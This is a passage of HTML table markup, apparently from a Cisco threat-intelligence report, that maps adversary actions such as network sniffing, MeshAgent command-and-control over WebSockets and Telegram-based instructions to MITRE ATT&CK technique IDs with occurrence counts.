-webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="37" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="728953116" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{93}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="880633813" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{166}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1040 Network Sniffing</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="360141691" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{173}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary executed monitor capture commands on specific interfaces to intercept and capture network traffic.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="789700863" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{180}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="38" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1040438942" paraeid="{c0df8aba-2d2b-4775-a268-184205e1efea}{105}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Command and control</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1941051787" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{210}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1071.001: Application Layer Protocol: Web Protocols</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1994882082" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{217}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary used<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">MeshAgent</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">to communicate with the C2 server over<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">WebSockets</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1744999481" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{224}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">5</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="39" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1854593527" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{105}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="762755498" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{232}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1102: Web Service&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1709659584" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{239}" style="-webkit-user-drag: none; margin: 16px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 11pt; line-height: 17px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary<span class="Apple-converted-space">&#xA0;</span></span></span><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">leveraged</span><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>a Telegram URL to issue instructions and download links.&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="789747556" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{248}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="40" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 